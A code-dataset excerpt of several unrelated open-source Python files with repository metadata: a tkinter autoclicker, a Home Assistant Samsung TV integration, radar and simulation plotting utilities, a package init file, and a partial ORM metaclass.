class GUI(tk.Frame):
# Contains all instance variables used throughout the GUI
def __init__(self, master=None):
super().__init__(master)
# The x cooridnate for the Desired Position
self.x = tk.IntVar()
self.x.set(0)
# The y cooridnate for the Desired Position
self.y = tk.IntVar()
self.y.set(0)
# Used to determine if the user wants the clicker to run indefinitely
self.infinite = tk.IntVar()
self.infinite.set(0)
# Used to determine if the user wants to clicker to double click with every click the clicker does
self.doubleVar = tk.IntVar()
self.doubleVar.set(0)
# Used to determine the length of time in seconds the user wants to run the clicker if they do not select infinite
self.lengthVar = tk.IntVar()
self.lengthVar.set(0)
# Used to determine the amount of delay in milliseconds between clicks the user wants
self.delayVar = tk.IntVar()
self.delayVar.set(0)
# Used for displaying the current position of the mouse on a label
self.mousePosVar = tk.StringVar()
self.mousePosVar.set("Current Mouse Position "+str(mouse.get_position()))
# Used to determine which button the mouse uses when the clicker runs
self.mouseButtonVar = tk.StringVar()
self.mouseButtonVar.set("Left")
# The options for buttons on the mouse the user has
self.mouseButtonOptions = ["Left", "Middle", "Right"]
# Used for emergency stops when the clicker is running
self.stopClickingVar = False
# Used to update the timer label
self.timerVar = tk.StringVar()
self.timerVar.set("Time left: " + str(0.0))
self.master = master
self.pack()
self.create_widgets()
self.displayCurrentMousePos()
# Used as a button command to send the mouse to the Desired Location
def sendMouse(self):
mouse.move(self.x.get(), self.y.get())
# Used as to call the mouse.move function and begin the loop that clicks the mouse with the desired settings, it also handles the timer and displaying the timer
def startSendClicking(self, start, firstRun=True):
# Used as a local variable used to make sure that the IntVar that affects the length entry isn't touched so that infinite can run without displaying the sys.maxsize
trueLength = self.lengthVar.get()
# Used to store the condition of whether the user chose the clicker to run idefinitely or not
infinite = bool(self.infinite.get())
# Used to assign the mouse type for clicking
mouse_type = mouse.LEFT
# Used to determine whether normal or double clicks are used
click_type = bool(self.doubleVar.get())
# The current time
current = time.time()
# The time that has passed since the loop started
elapsed = current - start
# Uses the param to send the mouse to the desired location when the loop runs for the first time, this is done to keep the mouse unlocked
if firstRun:
self.sendMouse()
# Allows the loop to run indefinitely but with an escape determine by the user
if infinite and not self.stopClickingVar:
trueLength = maxsize
else:
trueLength = self.lengthVar.get()
self.stopClickingVar = False
# Sets which mouse button is used in the auto clicker class function
if self.mouseButtonVar.get() == "Left":
mouse_type = mouse.LEFT
elif self.mouseButtonVar.get() == "Middle":
mouse_type = mouse.MIDDLE
else:
mouse_type = mouse.RIGHT
# A call to the autoclicker class function
if click_type:
mouse.double_click(mouse_type)
else:
mouse.click(mouse_type)
# The recursive part of the loop, it contains a failsafe so that if the user moves the mouse by at least ten pixels in any direction the clicker stops
if elapsed <= trueLength and not ((mouse.get_position()[0] > (self.x.get() + 10) or mouse.get_position()[0] < (self.x.get() - 10)) and (mouse.get_position()[1] > (self.y.get() - 10) or mouse.get_position()[1] < (self.y.get() + 10))):
if self.delayVar.get() > 0:
self.timerVar.set("Time left: " + str(round(self.lengthVar.get() - elapsed, 1)))
self.after(self.delayVar.get(), self.startSendClicking, start, False)
else:
self.after_idle(self.startSendClicking, start, False)
else:
self.timerVar.set("Time left: " + str(0.0))
# Sets the current mouse position to the desired one
def getCurrentMousePos(self, event=' '):
self.x.set(mouse.get_position()[0])
self.y.set(mouse.get_position()[1])
# Recursively displays the current mouse position
def displayCurrentMousePos(self):
self.mousePosVar.set("Current Mouse Position "+str(mouse.get_position()))
self.after(1, self.displayCurrentMousePos)
# Forces the clicker to stop with a keyboard button press
def stopClicking(self, event=' '):
self.stopClickingVar = True
self.lengthVar.set(0)
# The emergency quit for the clicker, skips the exit splash
def quitClicker(self, event=' '):
quit()
# Creates all of the widgets used in the GUI
def create_widgets(self):
# A label to mark the purpose of the associated entries below for the user
self.setPosLabel = tk.Label(self, text="Desired Position(X,Y)")
self.setPosLabel.grid(row=0, column=0, sticky=tk.N, padx=5, pady=5)
# An entry for the user to set the x coordinate for the desired position
self.setXEntry = tk.Entry(self, textvariable=self.x, justify=tk.RIGHT)
self.setXEntry.grid(row=0, column=1, sticky=tk.N, padx=5, pady=5)
# An entry for the user to set the y coordinate for the desired position
self.setYEntry = tk.Entry(self, textvariable=self.y, justify=tk.RIGHT)
self.setYEntry.grid(row=0, column=2, sticky=tk.N, padx=5, pady=5)
# A button for the user to test mouse coordinates by sending the mouse to the coordinates
self.sendMouseButton = tk.Button(self, text="Send Mouse", command=self.sendMouse)
self.sendMouseButton.grid(row=0, column=3, sticky=tk.N, padx=5, pady=5)
# The checkbox that allows the user to make the clicker run indefinitely
self.infiniteCheckButton = tk.Checkbutton(self, text="Infinite", variable=self.infinite, onvalue=1, offvalue=0)
self.infiniteCheckButton.grid(row=1, column=0, sticky=tk.W, padx=5, pady=5)
# The checkbox that allows the user to select whether the clicks the clicker does is normal or double
self.doubeCheckButton = tk.Checkbutton(self, text="Double", variable=self.doubleVar, onvalue=1, offvalue=0)
self.doubeCheckButton.grid(row=1, column=1, sticky=tk.W, padx=5, pady=5)
# A label to mark the purpose of the following entry for the user
self.lengthLabel = tk.Label(self, text="Length(s)")
self.lengthLabel.grid(row=2, column=0, sticky=tk.S, padx=5, pady=5)
# An entry for the user to set the length the program runs for
self.lengthEntry = tk.Entry(self, textvariable=self.lengthVar, justify=tk.RIGHT)
self.lengthEntry.grid(row=2, column=1, sticky=tk.S, padx=5, pady=5)
# A label that displays the current timer length
self.timerLabel = tk.Label(self, textvariable=self.timerVar)
self.timerLabel.grid(row=2, column=2, sticky=tk.S, padx=5, pady=5)
# A label to mark the purpose of the following entry for the user
self.delayLabel = tk.Label(self, text="Delay(ms)")
self.delayLabel.grid(row=3, column=0, sticky=tk.S, padx=5, pady=5)
# An entry for the user to set the delay for the clicker to use inbetween clicks
self.delayEntry = tk.Entry(self, textvariable=self.delayVar, justify=tk.RIGHT)
self.delayEntry.grid(row=3, column=1, sticky=tk.S, padx=5, pady=5)
# A drop down menu for the user to select which mouse button is used in the clicker
self.mouseButtonOptionMenu = tk.OptionMenu(self, self.mouseButtonVar, *self.mouseButtonOptions)
self.mouseButtonOptionMenu.grid(row=4, column=2, sticky=tk.E, padx=5, pady=5)
# A button for the user to begin the clicker
self.sendStartButton = tk.Button(self, text="Send & Start Clicking", command=lambda: self.startSendClicking(time.time()))
self.sendStartButton.grid(row=4, column=3, sticky=tk.E, padx=5, pady=5)
# A label that tells the user what the current position of their mouse is
self.currentPosLabel = tk.Label(self, textvariable=self.mousePosVar)
self.currentPosLabel.grid(row=5, column=0, sticky=tk.W, padx=5, pady=5)
# A button that, while it works, exists only to tell the user that the control key is used to set the current mouse position as the desired one
self.getCurrentPosButton = tk.Button(self, text="Set Desired Postion as Current Position(Press CTRL)", command=self.getCurrentMousePos)
self.getCurrentPosButton.grid(row=6, column=0, sticky=tk.W, padx=5, pady=5)
# The run code for the GUI, it changes the window title, icon, and binds all keyboard controls as well as starting the display updating loop
root = tk.Tk()
gui = GUI(master=root)
gui.master.title("AutoClicker")
gui.master.iconbitmap("icon.ico")
gui.master.bind('<Control_L>', gui.getCurrentMousePos)
gui.master.bind('<Escape>', gui.stopClicking)
gui.master.bind('<Shift-Escape>', gui.quitClicker)
gui.master.bind('<Return>', gui.startSendClicking)
gui.master.lift()
gui.master.attributes("-topmost", True)
gui.mainloop()
# The run code for the exit splash, it changes the window title, icon, and sets the splash to stay for 3 seconds
exitroot = tk.Tk()
exitsplash = ES.ExitSplash(master=exitroot)
exitsplash.master.title("Exit Splash")
exitsplash.master.iconbitmap("icon.ico")
exitsplash.after(3000, exitroot.destroy)
exitsplash.mainloop()
| 47.538462
| 241
| 0.673996
|
794fefbf21ced9a4d0f8221df4f08d6118034226
| 54
|
py
|
Python
|
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
from hcpa_biomed_processing import execute
execute()
| 13.5
| 42
| 0.851852
|
794fefffeccf062660906113be0cd3acf27e7981
| 6,685
|
py
|
Python
|
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | 1
|
2019-08-04T19:25:10.000Z
|
2019-08-04T19:25:10.000Z
|
"""
Support for interface with an Samsung TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.samsungtv/
"""
import logging
import socket
import voluptuous as vol
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_STEP,
SUPPORT_PLAY, MediaPlayerDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['samsungctl==0.6.0']
_LOGGER = logging.getLogger(__name__)
CONF_TIMEOUT = 'timeout'
DEFAULT_NAME = 'Samsung TV Remote'
DEFAULT_PORT = 55000
DEFAULT_TIMEOUT = 0
KNOWN_DEVICES_KEY = 'samsungtv_known_devices'
SUPPORT_SAMSUNGTV = SUPPORT_PAUSE | SUPPORT_VOLUME_STEP | \
SUPPORT_VOLUME_MUTE | SUPPORT_PREVIOUS_TRACK | \
SUPPORT_NEXT_TRACK | SUPPORT_TURN_OFF | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
})
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Samsung TV platform."""
known_devices = hass.data.get(KNOWN_DEVICES_KEY)
if known_devices is None:
known_devices = set()
hass.data[KNOWN_DEVICES_KEY] = known_devices
# Is this a manual configuration?
if config.get(CONF_HOST) is not None:
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
timeout = config.get(CONF_TIMEOUT)
elif discovery_info is not None:
tv_name, model, host = discovery_info
name = "{} ({})".format(tv_name, model)
port = DEFAULT_PORT
timeout = DEFAULT_TIMEOUT
else:
_LOGGER.warning(
'Internal error on samsungtv component. Cannot determine device')
return
# Only add a device once, so discovered devices do not override manual
# config.
ip_addr = socket.gethostbyname(host)
if ip_addr not in known_devices:
known_devices.add(ip_addr)
add_devices([SamsungTVDevice(host, port, name, timeout)])
_LOGGER.info("Samsung TV %s:%d added as '%s'", host, port, name)
else:
_LOGGER.info("Ignoring duplicate Samsung TV %s:%d", host, port)
class SamsungTVDevice(MediaPlayerDevice):
"""Representation of a Samsung TV."""
def __init__(self, host, port, name, timeout):
"""Initialize the Samsung device."""
from samsungctl import exceptions
from samsungctl import Remote
# Save a reference to the imported classes
self._exceptions_class = exceptions
self._remote_class = Remote
self._name = name
# Assume that the TV is not muted
self._muted = False
# Assume that the TV is in Play mode
self._playing = True
self._state = STATE_UNKNOWN
self._remote = None
# Generate a configuration for the Samsung library
self._config = {
'name': 'HomeAssistant',
'description': name,
'id': 'ha.component.samsung',
'port': port,
'host': host,
'timeout': timeout,
}
if self._config['port'] == 8001:
self._config['method'] = 'websocket'
else:
self._config['method'] = 'legacy'
def update(self):
"""Retrieve the latest data."""
# Send an empty key to see if we are still connected
return self.send_key('KEY')
def get_remote(self):
"""Create or return a remote control instance."""
if self._remote is None:
# We need to create a new instance to reconnect.
self._remote = self._remote_class(self._config)
return self._remote
def send_key(self, key):
"""Send a key to the tv and handles exceptions."""
try:
self.get_remote().control(key)
self._state = STATE_ON
except (self._exceptions_class.UnhandledResponse,
self._exceptions_class.AccessDenied, BrokenPipeError):
# We got a response so it's on.
# BrokenPipe can occur when the commands is sent to fast
self._state = STATE_ON
self._remote = None
return False
except (self._exceptions_class.ConnectionClosed, OSError):
self._state = STATE_OFF
self._remote = None
return False
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_SAMSUNGTV
def turn_off(self):
"""Turn off media player."""
if self._config['method'] == 'websocket':
self.send_key('KEY_POWER')
else:
self.send_key('KEY_POWEROFF')
# Force closing of remote session to provide instant UI feedback
self.get_remote().close()
def volume_up(self):
"""Volume up the media player."""
self.send_key('KEY_VOLUP')
def volume_down(self):
"""Volume down media player."""
self.send_key('KEY_VOLDOWN')
def mute_volume(self, mute):
"""Send mute command."""
self.send_key('KEY_MUTE')
def media_play_pause(self):
"""Simulate play pause media player."""
if self._playing:
self.media_pause()
else:
self.media_play()
def media_play(self):
"""Send play command."""
self._playing = True
self.send_key('KEY_PLAY')
def media_pause(self):
"""Send media pause command to media player."""
self._playing = False
self.send_key('KEY_PAUSE')
def media_next_track(self):
"""Send next track command."""
self.send_key('KEY_FF')
def media_previous_track(self):
"""Send the previous track command."""
self.send_key('KEY_REWIND')
def turn_on(self):
"""Turn the media player on."""
self.send_key('KEY_POWERON')
| 31.533019
| 77
| 0.638893
|
794ff0e78e65da514e612b51f968f8d4471422a9
| 10,899
|
py
|
Python
|
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | 1
|
2020-12-02T20:13:18.000Z
|
2020-12-02T20:13:18.000Z
|
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | null | null | null |
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | 3
|
2020-07-08T17:03:38.000Z
|
2020-07-08T19:03:40.000Z
|
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter, num2date
from matplotlib import patches
import matplotlib.patches as mpatches
import random
import pytz
import datetime as dt
import pandas as pd
import utils
CLUSTER_CMAP = plt.cm.gist_rainbow
def get_cluster_cmap(n_clusters, plot_noise=False):
cmap = CLUSTER_CMAP
cmaplist = [cmap(i) for i in range(cmap.N)]
while len(cmaplist) < n_clusters:
cmaplist.extend([cmap(i) for i in range(cmap.N)])
cmaplist = np.array(cmaplist)
r = np.array(range(len(cmaplist)))
random.seed(10)
random.shuffle(r)
cmaplist = cmaplist[r]
if plot_noise:
cmaplist[0] = (0, 0, 0, 1.0) # black for noise
rand_cmap = cmap.from_list("Cluster cmap", cmaplist, len(cmaplist))
return rand_cmap
class RangeTimePlot(object):
"""
Create plots for IS/GS flags, velocity, and algorithm clusters.
"""
def __init__(self, nrang, unique_times, fig_title, num_subplots=3):
self.nrang = nrang
self.unique_gates = np.linspace(1, nrang, nrang)
self.unique_times = unique_times
self.num_subplots = num_subplots
self._num_subplots_created = 0
self.fig = plt.figure(figsize=(8, 3*num_subplots), dpi=100) # Size for website
plt.suptitle(fig_title, x=0.075, y=0.95, ha="left", fontweight="bold", fontsize=15)
mpl.rcParams.update({"font.size": 10})
return
def addParamPlot(self, df, beam, title, p_max=100, p_min=-100, p_step=25, xlabel="Time UT", ylabel="Range gate", zparam="v",
label="Velocity [m/s]", ax=None, fig=None, addcb=True, ss_obj=None):
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam=zparam)
bounds = list(range(p_min, p_max+1, p_step))
cmap = plt.cm.jet
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
# cmap.set_bad("w", alpha=0.0)
# Configure axes
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
cax = ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
if fig is None: fig = self.fig
if addcb:
cbar = fig.colorbar(cax, ax=ax, shrink=0.7,
ticks=bounds,
spacing="uniform",
orientation="vertical")
cbar.set_label(label)
#self._add_colorbar(fig, ax, bounds, cmap, label=label)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
if ss_obj: self.lay_sunrise_sunset(ax, ss_obj)
return ax
def addCluster(self, df, beam, title, xlabel="", ylabel="Range gate", label_clusters=True, skill=None, ax=None, ss_obj=None):
# add new axis
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
unique_labs = np.sort(np.unique(df.labels))
for i, j in zip(range(len(unique_labs)), unique_labs):
if j > 0:
df["labels"]=np.where(df["labels"]==j, i, df["labels"])
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam="labels")
flags = df.labels
if -1 in flags:
cmap = get_cluster_cmap(len(np.unique(flags)), plot_noise=True) # black for noise
else:
cmap = get_cluster_cmap(len(np.unique(flags)), plot_noise=False)
# Lower bound for cmap is inclusive, upper bound is non-inclusive
bounds = list(range( len(np.unique(flags)) )) # need (max_cluster+1) to be the upper bound
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
if skill is not None:
txt = r"CH = %.1f, BH = %.1f $\times 10^{6}$"%(skill.chscore, skill.bhscore/1e6) +"\n"+\
"H = %.1f, Xu = %.1f"%(skill.hscore, skill.xuscore)
ax.text(0.8, 0.8, txt, horizontalalignment="center",
verticalalignment="center", transform=ax.transAxes)
if label_clusters:
num_flags = len(np.unique(flags))
for f in np.unique(flags):
flag_mask = Z.T==f
g = Y[flag_mask].astype(int)
t_c = X[flag_mask]
# Only label clusters large enough to be distinguishable on RTI map,
# OR label all clusters if there are few
if (len(t_c) > 250 or
(num_flags < 50 and len(t_c) > 0)) \
and f != -1:
m = int(len(t_c) / 2) # Time is sorted, so this is roughly the index of the median time
ax.text(t_c[m], g[m], str(int(f)), fontdict={"size": 8, "fontweight": "bold"}) # Label cluster #
return ax
def addGSIS(self, df, beam, title, xlabel="", ylabel="Range gate", zparam="gflg_0",
clusters=None, label_clusters=False, ax=None, ss_obj=None):
# add new axis
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam=zparam,)
flags = np.array(df[zparam]).astype(int)
if -1 in flags and 2 in flags: # contains noise flag
cmap = mpl.colors.ListedColormap([(0.0, 0.0, 0.0, 1.0), # black
(1.0, 0.0, 0.0, 1.0), # blue
(0.0, 0.0, 1.0, 1.0), # red
(0.0, 1.0, 0.0, 1.0)]) # green
bounds = [-1, 0, 1, 2, 3] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS"),
mpatches.Patch(color="black", label="US"), mpatches.Patch(color="green", label="SAIS")]
elif -1 in flags and 2 not in flags:
cmap = mpl.colors.ListedColormap([(0.0, 0.0, 0.0, 1.0), # black
(1.0, 0.0, 0.0, 1.0), # blue
(0.0, 0.0, 1.0, 1.0)]) # red
bounds = [-1, 0, 1, 2] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS"),
mpatches.Patch(color="black", label="US")]
else:
cmap = mpl.colors.ListedColormap([(1.0, 0.0, 0.0, 1.0), # blue
(0.0, 0.0, 1.0, 1.0)]) # red
bounds = [0, 1, 2] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS")]
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
ax.legend(handles=handles, loc=4)
if label_clusters:
flags = df.labels
num_flags = len(np.unique(flags))
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam="labels")
for f in np.unique(flags):
flag_mask = Z.T==f
g = Y[flag_mask].astype(int)
t_c = X[flag_mask]
# Only label clusters large enough to be distinguishable on RTI map,
# OR label all clusters if there are few
if (len(t_c) > 250 or
(num_flags < 100 and len(t_c) > 0)) \
and f != -1:
tct = ""
m = int(len(t_c) / 2) # Time is sorted, so this is roughly the index of the median time
if clusters[beam][int(f)]["type"] == "IS": tct = "%.1f IS"%((1-clusters[beam][int(f)]["auc"])*100)
if clusters[beam][int(f)]["type"] == "GS": tct = "%.1f GS"%(clusters[beam][int(f)]["auc"]*100)
ax.text(t_c[m], g[m], tct, fontdict={"size": 8, "fontweight": "bold", "color":"gold"}) # Label cluster #
return ax
def save(self, filepath):
self.fig.savefig(filepath, bbox_inches="tight")
def close(self):
self.fig.clf()
plt.close()
# Private helper functions
def _add_axis(self):
self._num_subplots_created += 1
ax = self.fig.add_subplot(self.num_subplots, 1, self._num_subplots_created)
ax.tick_params(axis="both", labelsize=12)
return ax
def _add_colorbar(self, fig, ax, bounds, colormap, label=""):
"""
Add a colorbar to the right of an axis.
:param fig:
:param ax:
:param bounds:
:param colormap:
:param label:
:return:
"""
import matplotlib as mpl
pos = ax.get_position()
cpos = [pos.x1 + 0.025, pos.y0 + 0.0125,
0.015, pos.height * 0.4] # this list defines (left, bottom, width, height
cax = fig.add_axes(cpos)
norm = mpl.colors.BoundaryNorm(bounds, colormap.N)
cb2 = mpl.colorbar.ColorbarBase(cax, cmap=colormap,
norm=norm,
ticks=bounds,
spacing="uniform",
orientation="vertical")
cb2.set_label(label)
return
| 48.874439
| 129
| 0.556473
|
794ff10ea4136d67db70e1e70fe82e6e415f34fe
| 934
|
py
|
Python
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | 2
|
2020-01-10T14:23:08.000Z
|
2020-02-21T20:36:49.000Z
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | 3
|
2019-12-09T08:10:41.000Z
|
2019-12-09T08:40:52.000Z
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <yoelcortes@gmail.com>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
from . import pickle
from . import representation
from . import decorators
from . import other
from . import cache
from . import registry
from . import colors
from . import plots
__all__ = (*pickle.__all__,
*representation.__all__,
*decorators.__all__,
*other.__all__,
*cache.__all__,
*registry.__all__,
*colors.__all__,
*plots.__all__,
)
from .pickle import *
from .representation import *
from .decorators import *
from .other import *
from .cache import *
from .registry import *
from .colors import *
from .plots import *
| 25.944444
| 75
| 0.691649
|
794ff33c2bc40452dcb98d0453cfb34711510d76
| 2,736
|
py
|
Python
|
pyal3dtf/plotting.py
|
petebachant/NACA0020-3D-OpenFOAM
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | 1
|
2021-08-16T03:32:48.000Z
|
2021-08-16T03:32:48.000Z
|
pyal3dtf/plotting.py
|
petebachant/actuatorLine-3D-turbinesFoam
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | 2
|
2015-10-17T01:01:53.000Z
|
2015-10-17T20:43:29.000Z
|
pyal3dtf/plotting.py
|
petebachant/NACA0020-3D-OpenFOAM
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | null | null | null |
"""
Plotting functions.
"""
import numpy as np
import matplotlib.pyplot as plt
from . import processing as pr
import os
def plot_spanwise_pressure(ax=None, simtype="BR", save=False):
"""Plot spanwise pressure, normalized and inverted."""
df = pr.load_sampled_set("spanwise", "p", simtype=simtype)
df["p_norm"] = -df.p
df.p_norm -= df.p_norm.min()
df.p_norm /= df.p_norm.max()
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df.p_norm)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$-\hat{p}$")
try:
fig.tight_layout()
except UnboundLocalError:
pass
if save:
savefig(fig=fig, name="spanwise-pressure-" + simtype)
def plot_alpha(ax=None):
"""Plot angle of attack versus vertical coordinate."""
df = pr.load_sampled_velocity(name="inflow")
pitch = pr.read_alpha_deg()
df["alpha_deg"] = pitch - np.rad2deg(np.tan(df.U_1/df.U_0))
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, -df.alpha_deg)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$\alpha$ (degrees)")
def plot_inflow(ax=None, component=None):
"""Plot inflow velocity magnitude versus vertical coordinate."""
df = pr.load_sampled_velocity(name="inflow")
if component is None:
vel = np.sqrt(df.U_0**2 + df.U_1**2)
ylabel = r"$|U_\mathrm{in}|$"
else:
vel = df["U_" + str(component)]
ylabel = r"$U_{}$".format(component)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, vel)
ax.set_xlabel("$z/H$")
ax.set_ylabel(ylabel)
def plot_trailing_vorticity(ax=None, simtype="BR", save=False):
"""Plot trailing vorticity versus vertical coordinate."""
df = pr.load_sampled_vorticity(name="trailing", simtype=simtype)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df.vorticity_2)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$\omega_z$")
try:
fig.tight_layout()
except UnboundLocalError:
pass
if save:
savefig(fig=fig, name="trailing-vorticity-" + simtype)
def plot_trailing_velocity(ax=None, component=0, simtype="BR"):
"""Plot trailing velocity versus vertical coordinate."""
df = pr.load_sampled_velocity(name="trailing", simtype=simtype)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df["U_" + str(component)])
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$U_{}$".format(component))
def savefig(fig=None, name=None):
"""Save to `figures` directory as PDF and PNG."""
if not os.path.isdir("figures"):
os.mkdir("figures")
if fig is not None:
plt = fig
plt.savefig("figures/{}.pdf".format(name))
plt.savefig("figures/{}.png".format(name), dpi=300)
| 29.73913
| 68
| 0.625731
|
794ff6bc1e17b53cea6c1471bd86225b63a69b94
| 2,157
|
py
|
Python
|
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
from . import fields
from . import descriptors
import weakref
import copy
'''
This is the most magical part of the orm.
Metaclass constructs other classes.
In practice converts Models from nice declarative format into working ones.
'''
class ModelMeta(type):
def __new__(cls, name, based, attributes):
# Always add primary key field
if 'pk' not in attributes:
attributes['pk'] = fields.PKField()
new_attributes = {}
new_attributes['fields'] = []
new_attributes['metafields'] = []
# Iterate through attributes (model fields)
for attrib_name in attributes:
attribute = attributes[attrib_name]
if isinstance(attribute, fields.Field):
new_attributes['fields'].append(attrib_name)
new_attributes['_'+attrib_name] = attribute
# This assigns descriptor to fields place and moves the original field class to _field-attribute
if isinstance(attribute, fields.ForeignKeyField):
new_attributes[attrib_name] = descriptors.ForeignFieldDescriptor(attrib_name)
else:
new_attributes[attrib_name] = descriptors.FieldDescriptor(attrib_name)
elif isinstance(attribute, fields.MetaField):
# Metafields like related-objects are not real fields so they are handled differently
new_attributes['metafields'].append(attrib_name)
new_attributes['_'+attrib_name] = attribute
